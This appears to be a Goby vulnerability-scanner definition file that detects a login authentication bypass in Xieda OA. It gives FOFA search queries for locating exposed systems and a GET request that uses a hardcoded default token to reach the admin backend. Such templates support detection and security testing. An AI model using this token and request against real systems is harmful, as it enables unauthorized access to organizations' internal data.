qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/Xieda-OA-system-bypasses-lo...

101 lines
2.9 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "Xieda OA system bypasses login authentication",
"Description": "<p>Xieda OA has a login authentication bypass vulnerability. Attackers use the default token to log in to the system background. <br></p>",
"Product": "Xieda OA System",
"Homepage": "http://www.ctop.cn/",
"DisclosureDate": "2021-12-01",
"Author": "learnupup@gmail.com",
"FofaQuery": "body=\"/interface/CheckLoginName.jsp\"",
"GobyQuery": "body=\"/interface/CheckLoginName.jsp\"",
"Level": "2",
"Impact": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">The attacker uses the default token to log in to the system background. </span><br></p>",
"Recommendation": "<p>1. Pay attention to the patch released by the manufacturer: <a href=\"http://www.ctop.cn/\">http://www.ctop.cn/</a></p><p> 2. Delete the default token</p>",
"Translation": {
"CN": {
"Name": "协达OA系统绕过登录认证登陆后台",
"Product": "协达OA系统",
"Description": "<p>协达OA系统是一款全面先进的OA系统</p><p>协达 OA 存在登录认证绕过漏洞攻击者利用默认的token登陆系统后台。<br></p>",
"Impact": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">攻击者利用默认的token登陆系统后台获取敏感信息进一步控制服务器。</span><br></p>",
"Recommendation": "<p>1、关注厂商发布补丁<a href=\"http://www.ctop.cn/\">http://www.ctop.cn/</a></p><p>2、删除默认token</p>",
"VulType": [
"权限绕过"
],
"Tags": [
"权限绕过"
]
}
},
"References": [],
"Is0day": false,
"HasExp": false,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/stylei/MainPage.jsp?token=YXR-YMD-SYQ-TOKEN",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "OA系统",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "我的桌面",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": null,
"Tags": [
"Permission bypass"
],
"VulType": [
"Permission bypass"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "7.5",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}
Reference in New Issue View Git Blame Copy Permalink